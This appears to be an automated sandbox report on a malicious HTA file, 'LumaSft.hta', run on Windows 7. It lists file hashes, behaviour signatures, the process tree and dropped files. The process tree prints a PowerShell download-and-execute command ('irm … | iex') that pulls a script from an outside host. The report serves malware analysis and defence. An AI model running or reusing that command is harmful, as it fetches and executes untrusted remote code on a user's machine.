Analysis

  • max time kernel
    120s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    04/02/2024, 18:40

General

  • Target

    LumaSft.hta

  • Size

    162KB

  • MD5

    50b4ea549c48d995ddf248188795d2d8

  • SHA1

    bfda7329b7a8519b20617d39da553464a3163d29

  • SHA256

    e93a2475fff6c02d66d92680bf19edfce3a89129e89408e76396ab1ee7ed36aa

  • SHA512

    42d22c0cd19a8dc3d923403a53115d2297355038c3a3d1ba93249b4f2faa3d5f84f594a49a7edcd2fa7d03f0fd0ac394ba12eb997c2f9ab97b3380e62e6fe949

  • SSDEEP

    384:fuhtvGkNrkNrkNrkNrkNrkNrkNrkNrkNrkNrkNUQtWgQlqQQwGt9OYF:fuusssssssssszQ6sQQl9O0

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\LumaSft.hta"
    1⤵
    • Blocklisted process makes network request
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm https://pg.zu.edu.ly/tt/gfdsgfdsgfdgfsdg.txt | iex
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2280

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CFHPCFFP\warning[1]

    Filesize

    1KB

    MD5

    124a9e7b6976f7570134b7034ee28d2b

    SHA1

    e889bfc2a2e57491016b05db966fc6297a174f55

    SHA256

    5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9

    SHA512

    ea1b3cc56bd41fc534aac00f186180345cb2c06705b57c88c8a6953e6ce8b9a2e3809ddb01daac66fa9c424d517d2d14fa45fbef9d74fef8a809b71550c7c145

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6MCRSFJ\error[1]

    Filesize

    1KB

    MD5

    b9bec45642ff7a2588dc6cb4131ea833

    SHA1

    4d150a53276c9b72457ae35320187a3c45f2f021

    SHA256

    b0abe318200dcde42e2125df1f0239ae1efa648c742dbf9a5b0d3397b903c21d

    SHA512

    c119f5625f1fc2bcdb20ee87e51fc73b31f130094947ac728636451c46dced7b30954a059b24fef99e1db434581fd9e830abceb30d013404aac4a7bb1186ad3a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6MCRSFJ\error[2]

    Filesize

    3KB

    MD5

    16aa7c3bebf9c1b84c9ee07666e3207f

    SHA1

    bf0afa2f8066eb7ee98216d70a160a6b58ec4aa1

    SHA256

    7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754

    SHA512

    245559f757bab9f3d63fb664ab8f2d51b9369e2b671cf785a6c9fb4723f014f5ec0d60f1f8555d870855cf9eb49f3951d98c62cbdf9e0dc1d28544966d4e70f1

  • C:\Users\Admin\AppData\Local\Temp\Cab53AE.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar53EF.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • memory/2280-45-0x00000000713B0000-0x000000007195B000-memory.dmp

    Filesize

    5.7MB

  • memory/2280-46-0x00000000004D0000-0x0000000000510000-memory.dmp

    Filesize

    256KB

  • memory/2280-47-0x00000000004D0000-0x0000000000510000-memory.dmp

    Filesize

    256KB

  • memory/2280-51-0x00000000004D0000-0x0000000000510000-memory.dmp

    Filesize

    256KB

  • memory/2280-57-0x00000000713B0000-0x000000007195B000-memory.dmp

    Filesize

    5.7MB

  • memory/2280-216-0x00000000713B0000-0x000000007195B000-memory.dmp

    Filesize

    5.7MB